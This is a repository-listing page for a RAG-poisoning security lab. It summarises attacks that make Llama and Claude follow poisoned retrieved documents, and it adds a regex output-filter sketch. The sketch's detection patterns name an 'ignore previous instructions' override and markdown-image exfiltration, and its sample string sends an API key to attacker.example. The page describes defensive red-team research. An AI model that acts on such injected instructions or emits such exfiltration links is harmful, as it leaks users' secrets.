
KezoSec/rag-poisoning-lab

A self-contained AI security lab demonstrating document poisoning, indirect prompt injection, and data exfiltration in RAG systems. Explores the "helpfulness paradox" across local and frontier LLMs.

⚡ Uses AI · Python · MIT · GitHub ↗

★ 0 stars

AI relevance score: 100

Solo-development score

AI tool traces

SUMMARY AI summary by gpt-5-mini

A self-contained Docker lab that demonstrates four classes of attacks against Retrieval-Augmented Generation (RAG) systems and defenses, validated on a local model (Llama 3.2 3B) and a frontier model (Claude Haiku 4.5). Intended for security researchers, red teams, and engineers building/defending RAG pipelines.

Key features:
- Reproducible attack scripts that inject payloads into a Chroma vector DB (document poisoning, indirect prompt injection, data exfiltration, PDF invisible-text smuggling).
- Local offline Llama via Ollama and optional Anthropic Claude integration; sentence-transformers embeddings; Docker Compose orchestration.
- Working defense: regex-based output filter and JSON evidence for each outcome.
- Headline finding: stronger reasoning/helpfulness in frontier models can increase susceptibility to content-poisoning; model safety is shape-based, so retrieval-layer controls are required.
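The summary mentions a regex-based output filter that records JSON evidence but does not show it. The following is a minimal sketch of that general idea, not the repository's actual filter: the rule names, patterns, and the `filter_output` function are all assumptions made for illustration.

```python
import json
import re

# Hypothetical rules: the lab's real patterns are not given in the summary.
SUSPICIOUS_PATTERNS = {
    # Markdown image whose URL carries a query string, a common exfiltration channel.
    "markdown_image_with_query": re.compile(
        r"!\[[^\]]*\]\(https?://[^)\s]*\?[^)\s]*\)"
    ),
    # Text echoing an instruction-override phrase from a poisoned document.
    "instruction_override": re.compile(
        r"ignore (?:all |any )?(?:previous|prior) instructions", re.IGNORECASE
    ),
}


def filter_output(answer: str) -> dict:
    """Scan a model answer and return a JSON-serializable evidence record."""
    hits = [
        name for name, pattern in SUSPICIOUS_PATTERNS.items()
        if pattern.search(answer)
    ]
    blocked = bool(hits)
    return {
        "blocked": blocked,
        "matched_rules": hits,
        # Withhold the answer entirely when any rule fires.
        "answer": "[response withheld by output filter]" if blocked else answer,
    }


if __name__ == "__main__":
    sample = "Summary: ![status](https://attacker.example/p.png?d=api_key_123)"
    print(json.dumps(filter_output(sample), indent=2))
```

A filter like this only inspects the shape of the final answer, so it would sit alongside retrieval-layer controls rather than replace them.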

DETECTED Detected AI stack

AI-related keywords that appear in this repo's description, GitHub topics, or the AI summary of its README, shown by category. Each badge links to the detailed ranking for its category.

🧠 LLM providers (2)

Anthropic Ollama

🗄️ Vector DBs (1)

Chroma

🔢 Embedding models (1)

sentence-transformers

🤖 LLM models (2)

Claude Llama

GitHub Topics

#ai-security #claude #llama #llm-security #prompt-injection #rag #red-teaming

Languages used (share by bytes)

Shell	15.4%
Python	81.5%
Dockerfile	3.1%

Owner information

Account: KezoSec

Type: User

Followers

Dates

GitHub created	2026-05-09
Last push	2026-05-09
First detected by this site	2026-05-09
Last fetched	2026-05-09 15:42

Similar repos (AI-related repos in the same language)

bgzhang1/sw2api

Reverse proxy for your ai quota from the SW platform.

Python ★ 19 AI 45

dea6cat/2b-agent

This llm Agent was created based on necessity for one that could simply use local models without making them hallucinate and keep them focus

Python ★ 1 AI 75

Zuboy/Carbon-Cost-Optimizer-Agentic-AI

An AI agent that decides where and when to run ML training jobs to minimize cost and carbon emissions, then launches them autonomously — exposed entirely through MCP tools.

Python ★ 1 AI 75

FuchaZ/lm-studio-vision-bridge

Give text-only AI agents eyes: provides an MCP image-recognition service through a local LM Studio vision model.

Python ★ 1 AI 45

Shrutirowlo/AI-Video-Agent

AI-powered video generation agent that automates script analysis, scene planning, and video creation.

Python ★ 1 AI 75

Shivang0/social-vision

Paste an Instagram/TikTok/YouTube/X link and Claude watches it for you — transcribes audio, reads on-screen text & visuals, explains what it's about. Local, cross-platform Claude Code plugin.

Python ★ 1 AI 70

markusbegerow/claude-fuer-oeffentliche-verwaltung

⚠️ Experimental skill collection for digitalization, specialized procedures (Fachverfahren), and organization in German public administration (OZG, FIM, FIT-Connect, AI use, eIDAS, BSI IT-Grundschutz, GDPR). Please test; issues/PRs welcome! No legal or data-protection advice, no binding official decisions. No citizen or employee data in the repo.

Python ★ 1 AI 75

knowledgegut/course-distiller

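Distills workshop/course recordings you are authorized to use into step-by-step study PDFs in brand colors; the final reassembly is handed back to the human brain. A Claude Code skill by 知識包小腸.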

Python ★ 1 AI 45